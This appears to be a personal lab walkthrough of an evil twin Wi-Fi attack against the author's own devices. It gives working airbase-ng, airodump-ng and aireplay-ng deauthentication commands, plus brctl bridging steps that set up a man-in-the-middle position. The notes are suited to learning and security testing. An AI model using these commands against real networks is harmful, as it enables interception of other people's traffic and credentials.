Setup

The Machines

A note on machine names.

kronos is the sheep.

mars is the attacker.

Goodies

On the attacking machine:

mars $ apt-get install bridge-utils

Procedure

Connect Sheep to Good Twin

First step is to connect the sheep to the good twin:

sheep $ iw dev wlan0 scan
sheep $ wpa_supplicant -D nl80211,wext -i wlan0 -c <(wpa_passphrase "YourESSIDHere" "YourPassphraseHere")

Or alternatively, edit /etc/network/interfaces and add this:

auto wlan0
iface wlan0 inet dhcp
    wpa-ssid MyRouter
    wpa-psk MyPassword

Connect Evil Twin to Internet

Okay, before we get started we have to explain a bit about the Evil Twin and its network interfaces.

The Evil Twin is recommended to have a minimum of ONE wifi device and ONE ethernet device. This makes it possible to create a bridge between the two network devices. Ethernet ensures that the man in the middle won't be too much of a bottleneck.

Now let's connect the Evil Twin to the internet using a physical network cable. This is the connection that the Sheep's internet traffic, once it has been parsed, will pass through on its way to the internet.

Device Information

Get info about your devices:

mars $ iwconfig

AP Information

Get info about the Good Twin AP:

mars $ airodump-ng wlan0

Create Evil Twin (Window 1)

To create our Evil Twin AP, we'll use airbase:

mars $ airbase-ng -a <BSSID> --essid <ESSID> -c <channel> <interface>

or, to make it shorter,

mars $ airbase-ng --essid <ESSID of network> <interface>

So for example, we might listen for the Good Twin router on channel 11, see it, then create our base station:

mars $ airbase-ng -a AA:BB:CC:DD:EE:FF --essid "HomeRouter" -c 10 wlan1
21:39:29  Created tap interface at0
21:39:29  Trying to set MTU on at0 to 1500
21:39:29  Trying to set MTU on wlan1 to 1800
21:39:29  Access Point with BSSID AA:BB:CC:DD:EE:FF started.

Make Evil Twin Obnoxious

Instrumenting the Network

No experiment in security would be any good if we weren't watching what was going on with the internals of the network!

I put a second wireless card on the sheep, and before the whole attack went down, I fired up wireshark and started a packet dump on the network to watch what was happening.

Deauth Sheep on Good Twin (Window 2)

Now, listen for the network from the attack platform. Make sure you don't use the same wireless card that you're using to run the air station!

mars $ airodump-ng -w eviltwin wlan0

Also, if we watch our airbase window, with the command we ran previously, we see some activity:

mars $ airbase-ng -a XXX --essid "Walrus" -c 11 wlan1
21:49:23  Created tap interface at0
21:49:23  Trying to set MTU on at0 to 1500
21:49:23  Access Point with BSSID XXX started.
21:53:08  Client XXX associated (WEP) to ESSID: "Walrus"
21:53:17  Client XXX associated (WEP) to ESSID: "Walrus"
21:53:27  Client XXX associated (unencrypted) to ESSID: "Walrus"
21:53:36  Client XXX associated (unencrypted) to ESSID: "Walrus"

Not sure what's going on there. We'll find out soon, I suppose.

Like a magnet, my Raspberry Pi and my iPhone both connected to the fake access point.

This may not even be necessary. Kick the Sheep off of the Good Twin router using aireplay's deauth attack:

mars $ aireplay-ng -0 1 -a <AP MAC Address> -c <Sheep MAC Address> wlan0

Once the sheep has been kicked off, it will begin to look for the Good Twin again. But the Evil Twin will be there instead.

Not sure about the output, but I think the sheep is connected to the Evil Twin.

Connecting Sheep to Evil Twin

The Sheep will begin to look for the Good Twin, will see the Evil Twin, and will connect to it.

Keeping Sheep Connected to Internet

Keep the sheep surfin the web, by creating a bridge.

Remember we created an evil twin access point with airbase-ng on wlan1, and the sheep has been kicked off the Good Twin and is now on the evil twin.

But we need to provide a bridge back to the Good Twin, so that we can continue to keep the Sheep's internet connection alive and going through the Evil Twin.

Bridging Devices

On mars, the attack machine, where you ran airbase-ng, you will have an new interface created by airbase-ng that is called at0. If at0 is bridged to a working internet connection, then voila, your client has a "wireless" connection through "their" router.

Our evil twin is on wlan1, our sheep's network connection is on at0, and our second wireless card or ethernet port with an internet connection is on eth0.

We'll build a bridge to connect an internet-enabled network interface (eth0) to the sheep's network connection (at0).

Note that at0 and eth0 DO NOT need to be the same router that's being spoofed. That means, you can spoof router A, and bridge a connection from the evil twin of router A to a different internet connection at router B. (And if that connection on router B is faster, the Sheep will probably prefer that you Man-In-The-Middle them!)

Building the Bridge

First, we'll add our bridge, call it lucifer:

mars $ brctl addbr lucifer

Now add the two interfaces we're bridging, eth0 and at0 (WARNING: if you are connected to the attacking machine via SSH, this may disconnect you from the machine!):

mars $ brctl addif lucifer at0
mars $ brctl addif lucifer eth0

Now assign IP address to the interfaces and bring them up using ifconfig:

mars $ ifconfig eth0 0.0.0.0 up
mars $ ifconfig at0 0.0.0.0 up

Now rasise the bridge that you've constructed:

mars $ ifconfig lucifer up

Autoconfigure the DHCP settings with dhclient

mars $ dhclient3 lucifer &

Analyze Results

Look at the results with ifconfig:

mars $ ifconfig

You should see the lucifer bridge.

Wayne's World

Aright, we've got the Sheep to successfully connect to hte Evil Twin AP. Now what?

Now the stage is set for a man-in-the-middle attack.

See Man in the Middle/Evil Twin page for more deets.

References

http://blog.erratasec.com/2007/08/sidejacking-with-hamster_05.html#.VdlxmNeZeRs

http://www.security.securethelock.com/configuring-dhcp3-man-middle-attacks/

https://github.com/P0cL4bs/3vilTwinAttacker

http://www.m0rd0r.eu/how-to-make-transparent-bridge-with-slackware-linux/